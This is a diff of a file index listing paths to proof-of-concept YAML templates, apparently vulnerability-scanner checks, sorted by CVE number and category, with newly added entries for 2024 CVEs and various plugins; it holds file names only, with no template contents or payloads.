+./poc/cve/CVE-2024-11178-1d03d4b0d9125cf395a9b36a817c53db.yaml ./poc/cve/CVE-2024-11179-1e778ca562fc16e9c8b2cbe854f17d8d.yaml ./poc/cve/CVE-2024-11179.yaml ./poc/cve/CVE-2024-1118-d2488e79cdb18e5fa6f4b114e5fd1973.yaml @@ -35144,6 +35184,7 @@ ./poc/cve/CVE-2024-1120.yaml ./poc/cve/CVE-2024-11200-2ed75e0618faa276dda0258a435ea9ca.yaml ./poc/cve/CVE-2024-11200.yaml +./poc/cve/CVE-2024-11201-aa3d65db710ab72aee8e6c78d61fbc19.yaml ./poc/cve/CVE-2024-11202-32578cc7038a4c251703cadebc084ad8.yaml ./poc/cve/CVE-2024-11202-52e2ce4340581c57296ec17159d2460d.yaml ./poc/cve/CVE-2024-11202-77caff140b8bc5be998ac80c9386051c.yaml @@ -35154,6 +35195,7 @@ ./poc/cve/CVE-2024-11202.yaml ./poc/cve/CVE-2024-11203-1cd59b8fc753c6adcd4897a2127aa88d.yaml ./poc/cve/CVE-2024-11203.yaml +./poc/cve/CVE-2024-11204-f87aa22c9bcd426fec72b8003f96482e.yaml ./poc/cve/CVE-2024-1121-f9acdd7e5d4400d7ac2f5c1f64969230.yaml ./poc/cve/CVE-2024-1121.yaml ./poc/cve/CVE-2024-11219-048b6dca7f14c30180d7d2d9e7d023ad.yaml @@ -35188,19 +35230,24 @@ ./poc/cve/CVE-2024-11265.yaml ./poc/cve/CVE-2024-1127-96dba372bfefb2c18f635a1075e27756.yaml ./poc/cve/CVE-2024-1127.yaml +./poc/cve/CVE-2024-11276-1c24f81d5eab39f4ec1228eaffb6a4d3.yaml ./poc/cve/CVE-2024-11277-371669e41b1bdbea10af14d85581448c.yaml ./poc/cve/CVE-2024-11277.yaml ./poc/cve/CVE-2024-11278-f2f3b28a1bbcb829b720cfe84f4bb1fb.yaml ./poc/cve/CVE-2024-11278.yaml ./poc/cve/CVE-2024-1128-67d8835f2e0e8ac11d097612ad9e363c.yaml ./poc/cve/CVE-2024-1128.yaml +./poc/cve/CVE-2024-11289-4184d5eaa04495a4f6cb218a2896f8eb.yaml ./poc/cve/CVE-2024-1129-0aba491c9fa777fb284efdb308d0b368.yaml ./poc/cve/CVE-2024-1129.yaml +./poc/cve/CVE-2024-11292-850b0e5aa453cf8d597f2fe778aca46b.yaml ./poc/cve/CVE-2024-11293-445cfc68523ff32c33fa3e493bbbe08c.yaml ./poc/cve/CVE-2024-11293.yaml ./poc/cve/CVE-2024-1130-098b26182013dbcd4e8583ec0a56cb16.yaml ./poc/cve/CVE-2024-1130.yaml +./poc/cve/CVE-2024-11323-93b3a3a19c4e461d1bd3833545daae0f.yaml ./poc/cve/CVE-2024-11324-744eea132cf5114313c8cf238c08e606.yaml +./poc/cve/CVE-2024-11324.yaml ./poc/cve/CVE-2024-11325-316ac125b380ef0e67ba0167790d2d3b.yaml ./poc/cve/CVE-2024-11325.yaml ./poc/cve/CVE-2024-11326-0c8fabfd859db33f6ff486f4e38a0506.yaml @@ -35215,11 +35262,15 @@ ./poc/cve/CVE-2024-11333.yaml ./poc/cve/CVE-2024-11334-0b8da3e1689c4970bc8a08684dc2b879.yaml ./poc/cve/CVE-2024-11334.yaml +./poc/cve/CVE-2024-11336-3e061f8446314ee414179038a3da58ff.yaml +./poc/cve/CVE-2024-11339-5fa325846534729a9ee06c7b2d86ccc1.yaml ./poc/cve/CVE-2024-1134-80f4a43eaea90aa0c6452abac73a271e.yaml ./poc/cve/CVE-2024-1134.yaml ./poc/cve/CVE-2024-11341-d9c0a662afec84fc95603ed54f2aec86.yaml +./poc/cve/CVE-2024-11341.yaml ./poc/cve/CVE-2024-11342-e05ffc71141aa17d097258d0a66a00da.yaml ./poc/cve/CVE-2024-11342.yaml +./poc/cve/CVE-2024-11352-2956a03392350547f722d5c5b1052818.yaml ./poc/cve/CVE-2024-11354-0e62ca18f9bdb0611f368a7276263f85.yaml ./poc/cve/CVE-2024-11354.yaml ./poc/cve/CVE-2024-11355-edf82e64900042596ef0c5f92c74100e.yaml @@ -35237,11 +35288,13 @@ ./poc/cve/CVE-2024-11365.yaml ./poc/cve/CVE-2024-11366-cc7c5723ad039e93a1f894e0ec9c21a6.yaml ./poc/cve/CVE-2024-11366.yaml +./poc/cve/CVE-2024-11368-4f78bcb719a028575fa2e8dc0ead82a6.yaml ./poc/cve/CVE-2024-11370-8905f30acaa5202d5d378bf4d5583236.yaml ./poc/cve/CVE-2024-11370-b85fbeb5ce3fb349473e622007a9f53a.yaml ./poc/cve/CVE-2024-11370.yaml ./poc/cve/CVE-2024-11371-95a048e99cf0968d3759cd47fec02e09.yaml ./poc/cve/CVE-2024-11371.yaml +./poc/cve/CVE-2024-11379-039fa25f860d0b73f90d1c2ba7698bfc.yaml ./poc/cve/CVE-2024-11381-4ba6eeaab054e0e01702e7251bb00372.yaml ./poc/cve/CVE-2024-11381.yaml ./poc/cve/CVE-2024-11385-43829d07561569d5ecaceb7ea47ba97c.yaml @@ -35273,6 +35326,7 @@ ./poc/cve/CVE-2024-11418-fabf33e92d70128a9b53e9bacfb521c3.yaml ./poc/cve/CVE-2024-11418.yaml ./poc/cve/CVE-2024-11420-2826e6328a5500d4faa1dc190ffc98cc.yaml +./poc/cve/CVE-2024-11420.yaml ./poc/cve/CVE-2024-11424-1220902dc85195463b8e6b1e1cc1470c.yaml ./poc/cve/CVE-2024-11424.yaml ./poc/cve/CVE-2024-11426-ada6fe273d3c0447cca6a4f9c17bc628.yaml @@ -35280,6 +35334,7 @@ ./poc/cve/CVE-2024-11428-f836c627b4521637a2e87c9552fd2a57.yaml ./poc/cve/CVE-2024-11428.yaml ./poc/cve/CVE-2024-11429-f2942bb3824b4d9b7780f8fbd0f14593.yaml +./poc/cve/CVE-2024-11429.yaml ./poc/cve/CVE-2024-11431-28e640b1d4d500562eca3cb2f0498909.yaml ./poc/cve/CVE-2024-11431.yaml ./poc/cve/CVE-2024-11432-5ab33a7cf49791cb848b0e8a8b92d04f.yaml @@ -35291,10 +35346,12 @@ ./poc/cve/CVE-2024-11438.yaml ./poc/cve/CVE-2024-11440-b26a27e98ac4778bf1db64f0d89b26d0.yaml ./poc/cve/CVE-2024-11440.yaml +./poc/cve/CVE-2024-11444-4063529e850dc8cdb770b409a5b563ef.yaml ./poc/cve/CVE-2024-11446-3888215e68990f5f74ea66a863aea2dd.yaml ./poc/cve/CVE-2024-11446.yaml ./poc/cve/CVE-2024-11447-053ad392530025b6e52689e2d755cb20.yaml ./poc/cve/CVE-2024-11447.yaml +./poc/cve/CVE-2024-11450-aa0eea523b63076daf425f6ddb400979.yaml ./poc/cve/CVE-2024-11453-fa7409a899cdcce4323f76f911032569.yaml ./poc/cve/CVE-2024-11453.yaml ./poc/cve/CVE-2024-11455-20245b95e832be32aa78c5dcdb250fbb.yaml @@ -35304,6 +35361,7 @@ ./poc/cve/CVE-2024-11456.yaml ./poc/cve/CVE-2024-11458-06c2883fbed5c08d970a9ed931a3e19e.yaml ./poc/cve/CVE-2024-11458.yaml +./poc/cve/CVE-2024-11460-54390097dc3ed52a0207a2b2c6c9909f.yaml ./poc/cve/CVE-2024-11461-79c81f7450c8a8210454f180a585b023.yaml ./poc/cve/CVE-2024-11461.yaml ./poc/cve/CVE-2024-11463-0bf104abede23adeb8af80d1e15ce8a5.yaml @@ -35314,6 +35372,7 @@ ./poc/cve/CVE-2024-1157.yaml ./poc/cve/CVE-2024-1158-c524eecd9e35e784bb852f087dadba65.yaml ./poc/cve/CVE-2024-1158.yaml +./poc/cve/CVE-2024-11585-2cea61d12b0cef27d38be3d7af3bdcdf.yaml ./poc/cve/CVE-2024-1159-e1be592d0538ff54babfcfb35ba5c078.yaml ./poc/cve/CVE-2024-1159.yaml ./poc/cve/CVE-2024-1160-6f8b52f63a7418371b1b3b9ca6d3a448.yaml @@ -35341,6 +35400,7 @@ ./poc/cve/CVE-2024-11684.yaml ./poc/cve/CVE-2024-11685-a8b92c4479bf790f7f0a4e95c7b55344.yaml ./poc/cve/CVE-2024-11685.yaml +./poc/cve/CVE-2024-11687-ce28bfd71dd54c3c29603bf27368d6c6.yaml ./poc/cve/CVE-2024-1169-007e07b24673895c34505297aed33632.yaml ./poc/cve/CVE-2024-1169.yaml ./poc/cve/CVE-2024-1170-319ccaea8169c279380313a5b41bae50.yaml @@ -35351,8 +35411,11 @@ ./poc/cve/CVE-2024-1171.yaml ./poc/cve/CVE-2024-1172-39dfeb3662991e9d246c7171e032fdd6.yaml ./poc/cve/CVE-2024-1172.yaml +./poc/cve/CVE-2024-11728-2c0f50aa3db592d906a698b62cca69c7.yaml +./poc/cve/CVE-2024-11729-fc3745f8e039decbc81308be45aacd79.yaml ./poc/cve/CVE-2024-1173-9e9606db29cc691b1619adba347c82df.yaml ./poc/cve/CVE-2024-1173.yaml +./poc/cve/CVE-2024-11730-2e1143d8e0f261dcfb3953128e8fb707.yaml ./poc/cve/CVE-2024-11732-6300c1dae27be21acd061d5288a24196.yaml ./poc/cve/CVE-2024-11732.yaml ./poc/cve/CVE-2024-11747-62f3cf7911a4e9abbe89a873183d1c75.yaml @@ -35370,6 +35433,7 @@ ./poc/cve/CVE-2024-1177-44b068407f4a1063af5594e6bad17afb.yaml ./poc/cve/CVE-2024-1177.yaml ./poc/cve/CVE-2024-11779-dc5a2e8f9e2fe37de6208069b0a261fc.yaml +./poc/cve/CVE-2024-11779.yaml ./poc/cve/CVE-2024-1178-26b664c2c5e2ce23e9059d41408b3b04.yaml ./poc/cve/CVE-2024-1178.yaml ./poc/cve/CVE-2024-11782-14c12bf1c0b93e64d33c585eee3be338.yaml @@ -35388,6 +35452,7 @@ ./poc/cve/CVE-2024-11813.yaml ./poc/cve/CVE-2024-11814-d146dcbc7cba6beb9447aebeae90eb88.yaml ./poc/cve/CVE-2024-11814.yaml +./poc/cve/CVE-2024-11823-96487c8862c6208dac1f43cc4dba71e2.yaml ./poc/cve/CVE-2024-1183.yaml ./poc/cve/CVE-2024-11844-07ec12dfcaf6ca937ccce1eaaff746ba.yaml ./poc/cve/CVE-2024-11844.yaml @@ -35413,6 +35478,9 @@ ./poc/cve/CVE-2024-11935.yaml ./poc/cve/CVE-2024-11952-16ad33d112d4e8604b5e9b540af90fd8.yaml ./poc/cve/CVE-2024-11952.yaml +./poc/cve/CVE-2024-12003-f77c04413b23540455a2432d7e006cc4.yaml +./poc/cve/CVE-2024-12027-ac20a46df6a7bc7dc3fb76e961264ae6.yaml +./poc/cve/CVE-2024-12028-743f7fbc736d510f8f41d855806fd00b.yaml ./poc/cve/CVE-2024-1203-cede147cec5ebe1dea014170dd370ad1.yaml ./poc/cve/CVE-2024-1203.yaml ./poc/cve/CVE-2024-1204-71ef2dafaa4ce9d17d3dff19cd522221.yaml @@ -35421,6 +35489,7 @@ ./poc/cve/CVE-2024-1205.yaml ./poc/cve/CVE-2024-1206-6b0dd76adaa2c8efc4ee8d32327a4705.yaml ./poc/cve/CVE-2024-1206.yaml +./poc/cve/CVE-2024-12060-bd4215568402b7df5ccbbeef7231911e.yaml ./poc/cve/CVE-2024-12062-e6f7834c3eb1eb9aabc9534922a2b0a2.yaml ./poc/cve/CVE-2024-12062.yaml ./poc/cve/CVE-2024-1207-9fc726e35e00675f40b1bb34bea36c9b.yaml @@ -35433,11 +35502,13 @@ ./poc/cve/CVE-2024-12099.yaml ./poc/cve/CVE-2024-1210-c4ebf3e8de4f3a2f2f0803da094f581c.yaml ./poc/cve/CVE-2024-1210.yaml +./poc/cve/CVE-2024-12110-a525586ff802b7e30487eba9d47bf8aa.yaml ./poc/cve/CVE-2024-1212.yaml ./poc/cve/CVE-2024-1213-387a75cacd130bdeb2c4a34a4e878883.yaml ./poc/cve/CVE-2024-1213.yaml ./poc/cve/CVE-2024-1214-054ce8e16369a5701a550443d837348b.yaml ./poc/cve/CVE-2024-1214.yaml +./poc/cve/CVE-2024-12155-7dae1ca184aa2d7a98e91ae763450832.yaml ./poc/cve/CVE-2024-1217-e1f7e39e09d8b79f70c462087458d021.yaml ./poc/cve/CVE-2024-1217.yaml ./poc/cve/CVE-2024-1218-b64b71b9fc6a036f1598c987aa88895e.yaml @@ -41915,6 +41986,7 @@ ./poc/cve/CVE-2024-39625-b25ba8a73f9f264b144bb90276b602f4.yaml ./poc/cve/CVE-2024-39625.yaml ./poc/cve/CVE-2024-39626-20d49ce68014b0f52f776e030e83d1bf.yaml +./poc/cve/CVE-2024-39626-ad9b3818c747f1ed3832fbdce623db21.yaml ./poc/cve/CVE-2024-39626.yaml ./poc/cve/CVE-2024-39627-4a34ef4adb6554c40e87a30e6b5db2d1.yaml ./poc/cve/CVE-2024-39627.yaml @@ -42239,6 +42311,7 @@ ./poc/cve/CVE-2024-4270-71a1f1fa5a88ca9142d08468825f0f57.yaml ./poc/cve/CVE-2024-4270.yaml ./poc/cve/CVE-2024-4271-5b99ce1eaa772815cebbffa47f093c3a.yaml +./poc/cve/CVE-2024-4271-7e84de8005b7402b3460842595eb6a21.yaml ./poc/cve/CVE-2024-4271.yaml ./poc/cve/CVE-2024-4272-ef148fde91b51decc3d6faaca1daa993.yaml ./poc/cve/CVE-2024-4272.yaml @@ -43368,6 +43441,7 @@ ./poc/cve/CVE-2024-46310.yaml ./poc/cve/CVE-2024-4632-2982e52fcd530894d6da3d0a4da476c6.yaml ./poc/cve/CVE-2024-4632.yaml +./poc/cve/CVE-2024-4633-a45a113bbd0240e2736131a0f29a199f.yaml ./poc/cve/CVE-2024-4634-734ec62f32f11cbd9efc436f0848d6e8.yaml ./poc/cve/CVE-2024-4634.yaml ./poc/cve/CVE-2024-4635-2a85fcbb7b4e2f404f278b3986d6e5c7.yaml @@ -43901,6 +43975,7 @@ ./poc/cve/CVE-2024-49231-4ca493e2a7410e05ce9e0c993ca6adbd.yaml ./poc/cve/CVE-2024-49231.yaml ./poc/cve/CVE-2024-49232-48b5fae78b5aebab16a53c10ca765c28.yaml +./poc/cve/CVE-2024-49232-5f4d040123f64c3c6cdaa6e80c6cdc46.yaml ./poc/cve/CVE-2024-49232.yaml ./poc/cve/CVE-2024-49233-261ba1e19db5d8ea0ca73754d2643b65.yaml ./poc/cve/CVE-2024-49233.yaml @@ -44248,6 +44323,7 @@ ./poc/cve/CVE-2024-49663.yaml ./poc/cve/CVE-2024-49664-adb366394b8166a57ef653ee11820dd5.yaml ./poc/cve/CVE-2024-49664.yaml +./poc/cve/CVE-2024-49665-0c7cde70a3364f6417c8986330b177f2.yaml ./poc/cve/CVE-2024-49665-96b5484bf4c14562249cedc7230dc2ee.yaml ./poc/cve/CVE-2024-49665.yaml ./poc/cve/CVE-2024-49667-8f698778b7c7d1f92d77acbee88d251f.yaml @@ -45565,6 +45641,7 @@ ./poc/cve/CVE-2024-52434.yaml ./poc/cve/CVE-2024-52435-9e7b393e302a2c2f90e1daf7f3c99acf.yaml ./poc/cve/CVE-2024-52435.yaml +./poc/cve/CVE-2024-52436-793469b5c4fe6748676f0c6f113984fc.yaml ./poc/cve/CVE-2024-52436-ab10caca0b4421ca608c6032e96ff13b.yaml ./poc/cve/CVE-2024-52436.yaml ./poc/cve/CVE-2024-52437-8045dc1d7e039deefe218726cfd5827e.yaml @@ -45838,6 +45915,60 @@ ./poc/cve/CVE-2024-53735.yaml ./poc/cve/CVE-2024-53736-9a7ae43cdef5a228c03407f042bfbc83.yaml ./poc/cve/CVE-2024-53736.yaml +./poc/cve/CVE-2024-53740-3512f8e780249684a6674da83d240a21.yaml +./poc/cve/CVE-2024-53741-3c0e15ff482eacb374486d199d05d15e.yaml +./poc/cve/CVE-2024-53742-0f8484e9711afc6f54dffab08b8fb64d.yaml +./poc/cve/CVE-2024-53743-c41dcd0f5b2eeb66644a41c3df7085c6.yaml +./poc/cve/CVE-2024-53744-19861d99577b3be5146b27b69f05c3f4.yaml +./poc/cve/CVE-2024-53745-5b88f5f8304e8fddbc476a349ec52bdb.yaml +./poc/cve/CVE-2024-53746-3ded91890966ff471c6e9354d423b5ef.yaml +./poc/cve/CVE-2024-53747-4e94b0bd06bf43aff2239514311d93c8.yaml +./poc/cve/CVE-2024-53748-7d8e48f7ecab5232b81666c88e70115b.yaml +./poc/cve/CVE-2024-53749-1d9d87f4022b97c2e4089a6828e241fc.yaml +./poc/cve/CVE-2024-53750-631ac7e2fd3894f3f08f81c51233807e.yaml +./poc/cve/CVE-2024-53751-eec858ad68cecec914c1fdcabd2501d5.yaml +./poc/cve/CVE-2024-53752-4e8cd08f77b9779e9257358737a94eef.yaml +./poc/cve/CVE-2024-53753-358e653d0dd73eb56688321aaef32145.yaml +./poc/cve/CVE-2024-53754-493566f1c1a1308e200b9e93498256c2.yaml +./poc/cve/CVE-2024-53755-504d4dcc3efe862c171e1626b904f4e4.yaml +./poc/cve/CVE-2024-53756-9cd6fd513857f8e7aa7f612ae1f35644.yaml +./poc/cve/CVE-2024-53757-9e5a50025a96a90d40bab8055add551b.yaml +./poc/cve/CVE-2024-53758-ebe442ae0c94160a0452474317b40359.yaml +./poc/cve/CVE-2024-53759-dbad57d1fe7a81773ada836f186bcbb3.yaml +./poc/cve/CVE-2024-53760-491bf87c29a91b27218dea79d03b2338.yaml +./poc/cve/CVE-2024-53761-ccd75e569a6f5c92a6b627a161efff1a.yaml +./poc/cve/CVE-2024-53762-f6f324446de244136f8f61b504284d66.yaml +./poc/cve/CVE-2024-53763-1664f5785c3962b04d39cbb880af99a4.yaml +./poc/cve/CVE-2024-53764-d38ed8a49a12e2b84a3819c47c303668.yaml +./poc/cve/CVE-2024-53765-1c8351ea02e8d70b52879086ddd276a2.yaml +./poc/cve/CVE-2024-53766-2940cf0523c9b377de42a03a2c813390.yaml +./poc/cve/CVE-2024-53767-774ba4d9c8507f0511f1d4fe58cfb435.yaml +./poc/cve/CVE-2024-53768-9a3deed242a94103b910250e4c9f9cc6.yaml +./poc/cve/CVE-2024-53769-15f79e5b8994448885f3d02862f03b54.yaml +./poc/cve/CVE-2024-53770-dde24fdaf6fdccf92776b21600160051.yaml +./poc/cve/CVE-2024-53771-3e40a710fce8ae1cf756cfd3c23e5785.yaml +./poc/cve/CVE-2024-53772-277c760c8d8f4930fc51c04bff87c407.yaml +./poc/cve/CVE-2024-53773-c70474e6b49675474684415b8bad7136.yaml +./poc/cve/CVE-2024-53774-eb9fe05556006515a14f186abd44c385.yaml +./poc/cve/CVE-2024-53775-27ea91b6010aa9c51cff5259b54c7600.yaml +./poc/cve/CVE-2024-53776-be68d5e8752ad62ee640890ae13d0500.yaml +./poc/cve/CVE-2024-53777-4cd0625e0e16873871e20b7b67514246.yaml +./poc/cve/CVE-2024-53778-f21730b86a71afb64088be9a871cf272.yaml +./poc/cve/CVE-2024-53779-cdef31c739309ab66ad6f17f25de736a.yaml +./poc/cve/CVE-2024-53780-c8b9d80262e337c12d17be598ed0d8eb.yaml +./poc/cve/CVE-2024-53781-82f815daf3b97e22b7a9510fbb6996a6.yaml +./poc/cve/CVE-2024-53782-c20bb4e081676aa3be7f9e7cd4a8a759.yaml +./poc/cve/CVE-2024-53783-77d64d8587b2b8b84b9dc1128c836d51.yaml +./poc/cve/CVE-2024-53784-633230e1ee0fbfce83da62ed739c6684.yaml +./poc/cve/CVE-2024-53785-fbeea1c61d1a3517baa1e80e34734207.yaml +./poc/cve/CVE-2024-53786-e41d57d430f469f2f89c135637eddbf0.yaml +./poc/cve/CVE-2024-53787-959f3b3e171585d69ebf8ef3fe99b91a.yaml +./poc/cve/CVE-2024-53788-02a231d247e905fcbe4ce7bc32a3afa3.yaml +./poc/cve/CVE-2024-53789-5b6e3f5ca751c7bbefd2d2d0478e9118.yaml +./poc/cve/CVE-2024-53790-4ea0f5d6a4c4995649db61ceb9cfefd1.yaml +./poc/cve/CVE-2024-53791-baff954ee6f7d9891e0773323ee016bc.yaml +./poc/cve/CVE-2024-53792-79e219d8701a1b03429312ab9d2266e2.yaml +./poc/cve/CVE-2024-53793-d3005914f049e11801fdde85b91a6bf6.yaml ./poc/cve/CVE-2024-5382-3f1ae151e74bf3a85689b92b47a722f8.yaml ./poc/cve/CVE-2024-5382.yaml ./poc/cve/CVE-2024-5416-b035cee38aeca20c0511efbe55146c96.yaml @@ -47480,6 +47611,7 @@ ./poc/cve/CVE-2024-8484-aa460791f2945a38184b69190c213c98.yaml ./poc/cve/CVE-2024-8484.yaml ./poc/cve/CVE-2024-8485-2139a808681732f8909df642970ccb77.yaml +./poc/cve/CVE-2024-8485-fa09b925d5408de5c1804d1d70100e86.yaml ./poc/cve/CVE-2024-8485.yaml ./poc/cve/CVE-2024-8486-41cb8426024ee44780a7b668bca4934f.yaml ./poc/cve/CVE-2024-8486.yaml @@ -48014,6 +48146,7 @@ ./poc/cve/CVE-2024-9267.yaml ./poc/cve/CVE-2024-9269-628eabdc4f57974ee22cd154a1c57075.yaml ./poc/cve/CVE-2024-9269.yaml +./poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml ./poc/cve/CVE-2024-9270-fc244377618ef643eb9c5fce0c45beaf.yaml ./poc/cve/CVE-2024-9270.yaml ./poc/cve/CVE-2024-9271-68f72266b66d02364a04b2066207b25f.yaml @@ -48329,12 +48462,15 @@ ./poc/cve/CVE-2024-9703.yaml ./poc/cve/CVE-2024-9704-f21a430d525f14c5222622c2499dbc1f.yaml ./poc/cve/CVE-2024-9704.yaml +./poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml +./poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml ./poc/cve/CVE-2024-9707-4fb16dfc3a442890f762f60d876d8c4d.yaml ./poc/cve/CVE-2024-9707.yaml ./poc/cve/CVE-2024-9708-4252407ec0b06f7586b8084bffab8674.yaml ./poc/cve/CVE-2024-9708.yaml ./poc/cve/CVE-2024-9756-64a408f630e792f3ff717cc9822672de.yaml ./poc/cve/CVE-2024-9756.yaml +./poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml ./poc/cve/CVE-2024-9772-5094698925e989ea36420156bd740e26.yaml ./poc/cve/CVE-2024-9772.yaml ./poc/cve/CVE-2024-9775-2f63da9b167b3f63935be0843938ce73.yaml @@ -48388,10 +48524,12 @@ ./poc/cve/CVE-2024-9864.yaml ./poc/cve/CVE-2024-9865-44de46ebb413c021b1f60bc0350545dc.yaml ./poc/cve/CVE-2024-9865.yaml +./poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml ./poc/cve/CVE-2024-9867-28418454e7529e38f715c32d4d7e771c.yaml ./poc/cve/CVE-2024-9867.yaml ./poc/cve/CVE-2024-9868-96549eced85be8945967e02f9312fbfb.yaml ./poc/cve/CVE-2024-9868.yaml +./poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml ./poc/cve/CVE-2024-9873-c5ed80b51344fca9873ea5af2135924b.yaml ./poc/cve/CVE-2024-9873.yaml ./poc/cve/CVE-2024-9874-bea265a3487d73370d286ee12cf991bf.yaml @@ -62663,6 +62801,7 @@ ./poc/header/reflected-headers.yaml ./poc/header/responsive-header-image-slider-e707d0c350d8dc1c30ea42e9b727161b.yaml ./poc/header/responsive-header-image-slider.yaml +./poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml ./poc/header/splash-header-ae1af7b8de10cb8ae21a4838e673d47b.yaml ./poc/header/splash-header.yaml ./poc/header/sqli_header (copy 1).yaml @@ -65590,6 +65729,7 @@ ./poc/microsoft/cisco-systems-login.yaml ./poc/microsoft/cluevo-lms-6a1d6ebcef69edeed5f796acb8a5f731.yaml ./poc/microsoft/cluevo-lms-78892043fdf34c1dee70d29718c1a4c1.yaml +./poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml ./poc/microsoft/cluevo-lms.yaml ./poc/microsoft/cms-commander-client-02814a0dc2d4695e21ba04ae5dcb9001.yaml ./poc/microsoft/cms-commander-client-76b931b6fcc8dbcb6e16d1e54df1775e.yaml @@ -66738,6 +66878,7 @@ ./poc/microsoft/plone-cms-detect-9608.yaml ./poc/microsoft/plone-cms-detect-9609.yaml ./poc/microsoft/plone-cms-detect.yaml +./poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml ./poc/microsoft/power-cpms.yaml ./poc/microsoft/power-powerpms.yaml ./poc/microsoft/powercreator-cms-rce-9643.yaml @@ -67824,6 +67965,7 @@ ./poc/open_redirect/edd-conditional-success-redirects-2d0f5856608a10fb29f7e370acc0b71e.yaml ./poc/open_redirect/edd-conditional-success-redirects.yaml ./poc/open_redirect/eelv-redirection-7ba8c53e6fc7be568c3f7112b05c02cb.yaml +./poc/open_redirect/eelv-redirection.yaml ./poc/open_redirect/elementorpage-open-redirect.yaml ./poc/open_redirect/eps-301-redirects-1bce881a5dd8f75156f2aebf72ebc190.yaml ./poc/open_redirect/eps-301-redirects-2268a5b6fb78d23bad4e5e4d75123bf2.yaml @@ -81812,6 +81954,7 @@ ./poc/other/advanced-text-widget.yaml ./poc/other/advanced-video-player-with-analytics-4dc92a626c4c712947784012a52de87d.yaml ./poc/other/advanced-video-player-with-analytics.yaml +./poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml ./poc/other/advanced-woo-labels-0a238862578d3a34700f31af1bddcd84.yaml ./poc/other/advanced-woo-labels.yaml ./poc/other/advanced-xml-reader-3261270b5d4d0fde7ff6ce7733883a23.yaml @@ -81991,6 +82134,7 @@ ./poc/other/ai-post-generator.yaml ./poc/other/ai-postpix.yaml ./poc/other/ai-quiz-1dcab1a05f3f74daca66940f53ea0b29.yaml +./poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml ./poc/other/ai-quiz.yaml ./poc/other/ai-responsive-gallery-album-10e9e38adf82d56ccf9c5f84280cc68b.yaml ./poc/other/ai-responsive-gallery-album.yaml @@ -82886,6 +83030,7 @@ ./poc/other/arabic-font.yaml ./poc/other/arbitrary-file-read.yaml ./poc/other/arc.yaml +./poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml ./poc/other/arcadian-846324c7e6ee105f2a750447d7a4292e.yaml ./poc/other/arcadian-d41d8cd98f00b204e9800998ecf8427e.yaml ./poc/other/arcadian-theme-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -82982,6 +83127,7 @@ ./poc/other/armember-membership-c3c10a73e269d56e0c5118a2f877f6e6.yaml ./poc/other/armember-membership-c4c58e1763f0301d804e616f8917ab0e.yaml ./poc/other/armember-membership-d58143355c6e31f8e27e102100f2ee0f.yaml +./poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml ./poc/other/armember-membership-f41c75a30f8586399a23c7c3b4068419.yaml ./poc/other/armember-membership-fc91b32f983201c975f911aefe316678.yaml ./poc/other/armember-membership-plugin-d41d8cd98f00b204e9800998ecf8427e.yaml @@ -83730,6 +83876,7 @@ ./poc/other/azure-storage-min-tls-version.yaml ./poc/other/azure-storage-network-unrestricted.yaml ./poc/other/azure-storage-public-access.yaml +./poc/other/azure-storage-sas-leak.yaml ./poc/other/azure-storage-secure-transfer.yaml ./poc/other/azure-storage-table-logging-disabled.yaml ./poc/other/azure-storage-trusted-access-disabled.yaml @@ -85352,6 +85499,7 @@ ./poc/other/build-app-online-32f80df1b109ff22ce643c64f178642d.yaml ./poc/other/build-app-online-5de1f71687a33e4868fd277d07372578.yaml ./poc/other/build-app-online-8ae0a50b0588a016d22cf69f1a56ae45.yaml +./poc/other/build-app-online-9dd1526748a52141c3bb31208d05fbb4.yaml ./poc/other/build-app-online-ae35b0408f717f09f9e4c38bab10a9b5.yaml ./poc/other/build-app-online-cdccf033d4ef87e79ca2b2f93c7e6f58.yaml ./poc/other/build-app-online.yaml @@ -86256,6 +86404,7 @@ ./poc/other/cf7-mailchimp-e2b56e01ba06c66b8d53d40581b73ce6.yaml ./poc/other/cf7-mailchimp.yaml ./poc/other/cf7-message-filter-a931ef27f1fab66c1eae13c745077459.yaml +./poc/other/cf7-message-filter-c1a17d8e31627d5c93bdc282adcf65c6.yaml ./poc/other/cf7-message-filter.yaml ./poc/other/cf7-multi-step-dc451ec0e984e189bd60b12f2825ad31.yaml ./poc/other/cf7-multi-step.yaml @@ -86755,6 +86904,7 @@ ./poc/other/click-to-tweet.yaml ./poc/other/clickbank-ads-clickbank-widget-d6b8359e3e9212d965b0520465799e76.yaml ./poc/other/clickbank-ads-clickbank-widget.yaml +./poc/other/clickbank-storefront-8afd882eedd0c6f2566c03372054a9da.yaml ./poc/other/clickcease-click-fraud-protection-56fbab53f4737937035a15f411a9fed0.yaml ./poc/other/clickcease-click-fraud-protection-fbabc2b317910d947190a57e8383f638.yaml ./poc/other/clickcease-click-fraud-protection.yaml @@ -88125,6 +88275,7 @@ ./poc/other/cosmetsy-core-063ec1d04fd842700414b0ad7c1028af.yaml ./poc/other/cosmetsy-core.yaml ./poc/other/cosmetsy.yaml +./poc/other/cosmosfarm-share-buttons-ecfd254ef292ce73504cf2aba9045a31.yaml ./poc/other/cost-calculator-builder-154b980d5cf1ecad4905d443198a00f7.yaml ./poc/other/cost-calculator-builder-b54885b1516bd4329cc2ac0f1a5c43fe.yaml ./poc/other/cost-calculator-builder-c5eabee15e287e016d57dc31e8627748.yaml @@ -88230,6 +88381,7 @@ ./poc/other/covertvideopress.yaml ./poc/other/cowboys4angels.yaml ./poc/other/cowidgets-elementor-addons-25c2398463a81a51ac170a0036ba7879.yaml +./poc/other/cowidgets-elementor-addons-b5f3c81a63289463e2ed249c024ac15f.yaml ./poc/other/cowidgets-elementor-addons-c186a5dcf674ce82665cc6fd4574d5e9.yaml ./poc/other/cowidgets-elementor-addons.yaml 